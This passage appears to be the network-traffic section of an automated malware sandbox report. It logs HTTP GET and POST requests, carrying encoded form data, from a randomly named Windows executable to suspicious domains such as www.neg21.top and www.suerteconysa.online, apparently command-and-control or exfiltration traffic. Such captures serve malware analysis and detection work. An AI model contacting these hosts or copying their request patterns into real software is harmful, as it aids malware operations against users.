                                                                        Data Ascii: N6gPj2W=J3/Bmh9CLUa/RKNV0MsevbIu4yjlRS0qqYICyZ0qGJl+XsVt7KrSTSMO851vf8Q1FcppaxV5AFiPM1UGxMNpsdvdwvg+cbUE3DphxWpg5VGkJwaCqoJ/N2SKV3ugfZIHbf10nOIJu8ph5f/wCkcEAOm/ndHNfqfuELuC/PSGis0a/MrkbeWEkfvbPyeIM+E8nvCj+s7mh77KkmTSSkcR5hxI+MsnkGZRnVhfoeuqa0qUi+r1ydtUhHYGGidVbYxLh9TlgE0D+IQ1VxmLyi6OXlFYCdOButp58cyiFmQnq7LHQavVSGKJuvxu85R4tthMJN0r1rfULruH9EkB18CxbigyREr8QH8kcQ6dZaxIw6qhzcCfynxyf5Slxrylpab48SkoLAjXbaQI6XhGLBYT2MCpp070tR5wdkyJOSP4474qw+s9iSslx2LqkFopgW8tsCdy80VIhByxIKWAzF/py02YvgDmxBsXGYWs2V6/58pRoqqiZqb3CLUBtnMwTHD00ZVkUCdDsgFnvc0QwsPDM28ZlRPvOL0rfCmnvC0zdcIJ1IbSk77yIe4bhGvkn6VUmW2NNdfCcI6B+zPVjBbjsyk0HsmebEnk/hTJDn54I9lIfveWQsNdfDlr0Slruthv64ka3gZYeQoiIQL3B+SOpgDTcI7eVlq7iNuMMSNiR5464/hZewx7kmj8OmI+zBPIOGZzMYMjlbV8fZLmk9I1T0PAIhf7LxvaMCFEXtI8LWmZONTF3A813Gw/Lot4CkOyyTay4esCq2qbWqIxLAJI3gEA7WZsTq0dlTrnhOjzhN6wDn7JRNxQjBUdOR/4ZDOi+HsPfZXBuROGjgL+LKpp2Jc4Rgf7Tzt4gY1Zj+QRCBWXWWwslA6Mfs65dI4FlpdmYUVpbpjL6iZX64hMx4Uvm+aBhHjXORgMU/+D8H6G046x5uj38Sahmj2rsPIIsX28U/bl8IX8D/IGEA4Spmk3GG8iq7OAFSbK3YKeO+IUMaP8 [TRUNCATED]
                                                                        Nov 7, 2024 10:12:12.447926998 CET533INHTTP/1.1 404 Not Found
                                                                        Date: Thu, 07 Nov 2024 09:12:12 GMT
                                                                        Server: Apache
                                                                        Content-Length: 389
                                                                        Connection: close
                                                                        Content-Type: text/html
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        28192.168.2.55000867.223.117.142802276C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 7, 2024 10:12:14.323975086 CET353OUTGET /saaz/?N6gPj2W=E1XhlXFLcWuCDIBP8to2tuUVnSemexwJ48Ab55V5HKBvWu90vpvIEGRMt7lYWMU5NPNXOFUjE36KCHhW/fBhyMiphohAP4glwjROtQZlzRCPRSaJk41pBGj4Bhn1O6AIFQ==&yx-=dF9dYX9pQR-xIhFp HTTP/1.1
                                                                        Host: www.jorbaq.top
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Nov 7, 2024 10:12:14.994524002 CET548INHTTP/1.1 404 Not Found
                                                                        Date: Thu, 07 Nov 2024 09:12:14 GMT
                                                                        Server: Apache
                                                                        Content-Length: 389
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        29192.168.2.550009206.119.81.36802276C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 7, 2024 10:12:20.481391907 CET597OUTPOST /w6i7/ HTTP/1.1
                                                                        Host: www.neg21.top
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Origin: http://www.neg21.top
                                                                        Referer: http://www.neg21.top/w6i7/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 208
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Data Raw: 4e 36 67 50 6a 32 57 3d 2b 64 54 57 45 33 30 77 70 73 41 41 75 54 74 73 33 56 4e 49 61 59 61 56 39 44 79 76 2f 78 31 68 61 32 43 63 55 38 67 5a 6e 59 4f 41 52 58 34 52 51 67 57 44 75 70 75 45 4d 6d 42 6d 33 57 45 41 38 75 4f 36 67 50 7a 5a 42 43 6d 33 45 6f 59 44 77 77 79 2b 70 51 6d 33 2b 4e 64 4b 77 65 66 48 45 39 54 7a 51 4a 61 6b 7a 59 77 4d 2f 4a 71 68 46 57 75 49 38 6c 62 6a 47 33 68 39 6a 35 2f 53 38 41 33 6b 48 50 75 49 32 53 6b 49 39 4b 62 31 52 61 71 52 4c 4c 66 43 5a 6f 79 6b 7a 57 62 32 33 49 7a 62 5a 65 48 6b 79 62 31 66 2b 2f 4a 6f 58 72 6a 37 65 67 34 45 76 52 46 55 35 7a 61 43 5a 4a 59 55 34 6f 41 3d
                                                                        Data Ascii: N6gPj2W=+dTWE30wpsAAuTts3VNIaYaV9Dyv/x1ha2CcU8gZnYOARX4RQgWDupuEMmBm3WEA8uO6gPzZBCm3EoYDwwy+pQm3+NdKwefHE9TzQJakzYwM/JqhFWuI8lbjG3h9j5/S8A3kHPuI2SkI9Kb1RaqRLLfCZoykzWb23IzbZeHkyb1f+/JoXrj7eg4EvRFU5zaCZJYU4oA=
                                                                        Nov 7, 2024 10:12:21.403739929 CET289INHTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Thu, 07 Nov 2024 09:12:21 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 146
                                                                        Connection: close
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        30192.168.2.550010206.119.81.36802276C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 7, 2024 10:12:23.068267107 CET617OUTPOST /w6i7/ HTTP/1.1
                                                                        Host: www.neg21.top
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Origin: http://www.neg21.top
                                                                        Referer: http://www.neg21.top/w6i7/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 228
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Data Raw: 4e 36 67 50 6a 32 57 3d 2b 64 54 57 45 33 30 77 70 73 41 41 76 7a 64 73 77 30 4e 49 4c 34 61 57 68 7a 79 76 30 52 31 66 61 32 4f 63 55 35 5a 47 6e 74 2b 41 53 32 49 52 54 68 57 44 6e 35 75 45 5a 57 42 6a 7a 57 45 78 38 75 53 63 67 4f 50 5a 42 43 61 33 45 71 51 44 7a 44 61 39 70 41 6d 31 72 64 64 49 76 4f 66 48 45 39 54 7a 51 4a 4f 4f 7a 59 6f 4d 2f 35 61 68 47 7a 43 4a 32 46 62 6b 51 48 68 39 6e 35 2f 6f 38 41 32 65 48 4f 79 32 32 51 4d 49 39 49 54 31 49 6f 4f 65 51 62 66 41 55 49 7a 51 36 55 79 66 2f 4c 36 56 52 64 43 75 78 59 67 69 79 70 34 43 4e 4a 72 54 4e 41 55 38 2f 43 4e 6a 6f 44 37 72 44 71 49 6b 6d 2f 57 6b 63 77 30 41 70 43 5a 79 59 6a 31 70 46 6d 32 2b 42 64 30 45
                                                                        Data Ascii: N6gPj2W=+dTWE30wpsAAvzdsw0NIL4aWhzyv0R1fa2OcU5ZGnt+AS2IRThWDn5uEZWBjzWEx8uScgOPZBCa3EqQDzDa9pAm1rddIvOfHE9TzQJOOzYoM/5ahGzCJ2FbkQHh9n5/o8A2eHOy22QMI9IT1IoOeQbfAUIzQ6Uyf/L6VRdCuxYgiyp4CNJrTNAU8/CNjoD7rDqIkm/Wkcw0ApCZyYj1pFm2+Bd0E
                                                                        Nov 7, 2024 10:12:23.963917017 CET289INHTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Thu, 07 Nov 2024 09:12:23 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 146
                                                                        Connection: close
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        31192.168.2.550011206.119.81.36802276C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 7, 2024 10:12:25.629606962 CET1634OUTPOST /w6i7/ HTTP/1.1
                                                                        Host: www.neg21.top
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Origin: http://www.neg21.top
                                                                        Referer: http://www.neg21.top/w6i7/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 1244
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Data Raw: 4e 36 67 50 6a 32 57 3d 2b 64 54 57 45 33 30 77 70 73 41 41 76 7a 64 73 77 30 4e 49 4c 34 61 57 68 7a 79 76 30 52 31 66 61 32 4f 63 55 35 5a 47 6e 74 32 41 53 46 51 52 54 43 2b 44 39 35 75 45 46 47 42 69 7a 57 45 57 38 75 61 41 67 4f 43 73 42 48 65 33 45 4a 49 44 79 79 61 39 69 41 6d 31 30 74 64 4c 77 65 66 6f 45 2b 37 33 51 4a 65 4f 7a 59 6f 4d 2f 2f 2b 68 52 32 75 4a 77 46 62 6a 47 33 67 70 6a 35 2b 6d 38 41 2f 38 48 4f 33 4e 32 67 73 49 39 6f 6a 31 54 36 57 65 4e 4c 66 65 54 49 7a 49 36 55 75 45 2f 4c 58 6b 52 65 65 41 78 59 49 69 32 4e 31 67 54 62 6a 45 51 6a 41 5a 2f 6c 4a 65 6f 45 47 50 4e 4b 73 78 68 75 71 46 62 52 67 2b 76 31 42 2f 51 67 56 69 47 7a 36 59 41 61 78 56 75 31 6f 44 68 62 51 56 6a 6c 78 6b 6b 30 69 37 51 59 6e 78 73 63 4b 48 6c 6f 54 50 33 69 62 47 4f 5a 53 68 42 6f 78 37 46 73 37 58 77 4d 2b 59 32 4d 75 50 65 5a 72 68 51 72 2b 32 41 70 6e 66 41 68 4d 53 49 32 41 4f 47 37 6f 45 7a 52 53 45 66 64 4c 52 32 71 78 77 67 44 55 6d 68 35 71 64 61 36 6e 36 57 7a 4c 34 50 6e 6f 58 52 63 [TRUNCATED]
                                                                        Data Ascii: N6gPj2W=+dTWE30wpsAAvzdsw0NIL4aWhzyv0R1fa2OcU5ZGnt2ASFQRTC+D95uEFGBizWEW8uaAgOCsBHe3EJIDyya9iAm10tdLwefoE+73QJeOzYoM//+hR2uJwFbjG3gpj5+m8A/8HO3N2gsI9oj1T6WeNLfeTIzI6UuE/LXkReeAxYIi2N1gTbjEQjAZ/lJeoEGPNKsxhuqFbRg+v1B/QgViGz6YAaxVu1oDhbQVjlxkk0i7QYnxscKHloTP3ibGOZShBox7Fs7XwM+Y2MuPeZrhQr+2ApnfAhMSI2AOG7oEzRSEfdLR2qxwgDUmh5qda6n6WzL4PnoXRcVqSPga0kJqv8H8c/QvTgnL/c4LeStSymQ1/mVwldlPTPu8xugLMkHLuBKAcg3FwOkpMiWCHQ7A38PpiffvJhnF6/AcDzKMqoX0jin5/LInrOGaIPg+v5HLJpYSrxS0vVE4J4Z40W1Uxx9sTvcgKIMSCc7ovYffBWAXBTyrYeeMNdhiXpKj/Xb4SMkWPhHy7SsYaxfFNtCz7/ko52imsrEE2eeF/ZYCMNy5OpXuKPY4e5y0POOU/xbkQNKLYqp3X1ZqWtmURmx6l2l2X5Bhy8GuFQU2nYNplOGUzFcDfbP4E/mxWMkJnM/cfWYmMyBBs1gF5fjjAo1HoiR8OUgEDg0MX8UJEAPJ9VN6y3ah3xhYW8VK1TLc/7VPQwQECgheEIlUuzRvGgrjgI1rVPhfbalVwxtvD16ndUpLiJIN/bOwJS9m79+x0m9eE+21L1Oxinch8rHSwmSBks6iyxg43/VaMrjCT4Adm7ZOhQk0E5jmUrlJr7BM0PKyapOeU15uI9POmJlJRfsktPiLK9qmbFkUEOCN1e0EzEMjo6O+qeCIsYpPFgxQobED58IR6BYhhq4j6UuCH2CMDXMPpdeYNhGAiuwRS/ABPrzWCUWFTtVXFM3xUnYB15B1pg2nvReYfm+RPmod/f6HG6Zu9CAc9v6R23v1P+1fCU0v [TRUNCATED]
                                                                        Nov 7, 2024 10:12:26.574258089 CET289INHTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Thu, 07 Nov 2024 09:12:26 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 146
                                                                        Connection: close
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        32192.168.2.550012206.119.81.36802276C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 7, 2024 10:12:28.173502922 CET352OUTGET /w6i7/?N6gPj2W=zf72HCwdm90Brz0/xWE1IYSOiQ3p3A59Q1iHXpkTu9OkdWFvcQX+8+iDJHR0+30T1teAh9aKH0eMHZRU0BnG1yy/rK5I2oPmb97GAfqKy80sg6qoYznK3DHqFQwxpou29A==&yx-=dF9dYX9pQR-xIhFp HTTP/1.1
                                                                        Host: www.neg21.top
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Nov 7, 2024 10:12:29.106376886 CET289INHTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Thu, 07 Nov 2024 09:12:28 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 146
                                                                        Connection: close
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        33192.168.2.55001384.32.84.32802276C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 7, 2024 10:12:34.425335884 CET627OUTPOST /2k8c/ HTTP/1.1
                                                                        Host: www.suerteconysa.online
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Origin: http://www.suerteconysa.online
                                                                        Referer: http://www.suerteconysa.online/2k8c/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 208
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Data Raw: 4e 36 67 50 6a 32 57 3d 47 50 55 63 36 77 6d 6c 70 55 5a 6d 76 6d 42 64 46 37 54 63 31 4b 33 7a 73 54 62 59 50 32 52 38 57 4e 6a 65 46 54 57 6d 67 31 61 4b 79 37 31 4a 4a 64 38 4a 63 32 30 64 78 2f 48 6e 69 46 75 51 36 4a 73 50 30 7a 42 72 6a 4a 43 69 57 43 64 62 78 61 4c 30 44 6f 51 59 49 34 54 2f 47 42 78 50 4c 48 4b 64 57 70 32 74 31 52 77 4b 72 58 5a 61 69 47 54 6d 58 43 75 30 6d 54 32 75 35 37 70 6e 63 4a 52 6f 58 63 44 5a 75 44 41 79 6e 78 68 42 61 68 61 30 38 36 56 5a 47 4c 56 59 4c 31 47 41 63 6c 39 2f 61 64 76 49 79 7a 76 38 36 4e 59 63 50 66 71 57 6e 52 55 72 38 51 53 6d 65 32 51 6a 44 73 68 76 66 73 49 3d
                                                                        Data Ascii: N6gPj2W=GPUc6wmlpUZmvmBdF7Tc1K3zsTbYP2R8WNjeFTWmg1aKy71JJd8Jc20dx/HniFuQ6JsP0zBrjJCiWCdbxaL0DoQYI4T/GBxPLHKdWp2t1RwKrXZaiGTmXCu0mT2u57pncJRoXcDZuDAynxhBaha086VZGLVYL1GAcl9/advIyzv86NYcPfqWnRUr8QSme2QjDshvfsI=


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        34192.168.2.55001484.32.84.32802276C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 7, 2024 10:12:36.984169006 CET647OUTPOST /2k8c/ HTTP/1.1
                                                                        Host: www.suerteconysa.online
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Origin: http://www.suerteconysa.online
                                                                        Referer: http://www.suerteconysa.online/2k8c/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 228
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Data Raw: 4e 36 67 50 6a 32 57 3d 47 50 55 63 36 77 6d 6c 70 55 5a 6d 76 48 78 64 44 59 37 63 35 36 33 79 67 7a 62 59 41 57 52 34 57 4d 66 65 46 57 6d 32 6a 42 32 4b 78 61 46 4a 49 63 38 4a 51 57 30 64 6c 76 48 2b 76 6c 75 62 36 4a 68 36 30 78 46 72 6a 4a 57 69 57 44 74 62 78 74 58 33 43 34 51 65 64 6f 54 71 43 42 78 50 4c 48 4b 64 57 70 69 55 31 52 59 4b 6f 6b 52 61 7a 54 7a 6c 65 69 75 33 68 54 32 75 7a 62 70 72 63 4a 51 46 58 65 33 33 75 42 49 79 6e 78 52 42 5a 77 61 31 7a 36 56 66 62 37 56 4f 49 6e 66 48 61 45 68 58 66 4c 32 66 68 43 37 58 32 62 70 32 56 39 69 2b 30 78 34 54 73 44 61 52 50 47 78 4b 5a 50 78 66 42 37 63 4d 43 62 42 30 38 61 58 66 2f 51 46 2f 6c 46 73 68 46 2b 35 44
                                                                        Data Ascii: N6gPj2W=GPUc6wmlpUZmvHxdDY7c563ygzbYAWR4WMfeFWm2jB2KxaFJIc8JQW0dlvH+vlub6Jh60xFrjJWiWDtbxtX3C4QedoTqCBxPLHKdWpiU1RYKokRazTzleiu3hT2uzbprcJQFXe33uBIynxRBZwa1z6Vfb7VOInfHaEhXfL2fhC7X2bp2V9i+0x4TsDaRPGxKZPxfB7cMCbB08aXf/QF/lFshF+5D


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        35192.168.2.55001584.32.84.32802276C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 7, 2024 10:12:39.535459995 CET1664OUTPOST /2k8c/ HTTP/1.1
                                                                        Host: www.suerteconysa.online
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Origin: http://www.suerteconysa.online
                                                                        Referer: http://www.suerteconysa.online/2k8c/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 1244
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Data Raw: 4e 36 67 50 6a 32 57 3d 47 50 55 63 36 77 6d 6c 70 55 5a 6d 76 48 78 64 44 59 37 63 35 36 33 79 67 7a 62 59 41 57 52 34 57 4d 66 65 46 57 6d 32 6a 42 2b 4b 78 6f 64 4a 4a 2b 55 4a 52 57 30 64 36 66 48 37 76 6c 75 38 36 4a 35 2b 30 78 49 55 6a 4c 75 69 45 78 6c 62 7a 5a 6a 33 49 34 51 65 66 6f 54 2b 47 42 78 67 4c 48 61 5a 57 70 79 55 31 52 59 4b 6f 6c 42 61 7a 47 54 6c 63 69 75 30 6d 54 32 59 35 37 70 50 63 4a 5a 77 58 65 6a 4a 76 78 6f 79 6e 56 31 42 4b 79 79 31 36 36 56 64 59 37 55 4e 49 6e 6a 49 61 45 39 39 66 4c 71 35 68 45 4c 58 7a 66 73 56 4f 39 6d 52 71 77 68 78 70 51 75 2f 50 32 68 4b 57 63 5a 75 64 37 41 77 44 50 42 59 30 36 7a 68 31 6b 34 6d 34 43 6f 6b 48 4f 6f 78 42 39 44 63 30 77 62 32 4b 48 32 4d 72 53 49 78 67 46 34 70 6c 54 58 32 56 59 38 71 43 58 4b 59 64 4a 32 55 78 49 43 4f 54 57 67 39 4e 54 51 69 42 48 78 57 38 45 41 63 64 62 53 49 38 66 65 32 63 66 4a 79 46 30 4b 4f 31 61 75 70 41 43 38 7a 59 70 46 71 4d 69 55 69 2f 6c 56 74 63 70 7a 65 59 42 63 34 6c 43 79 2b 34 35 64 42 6b 44 [TRUNCATED]
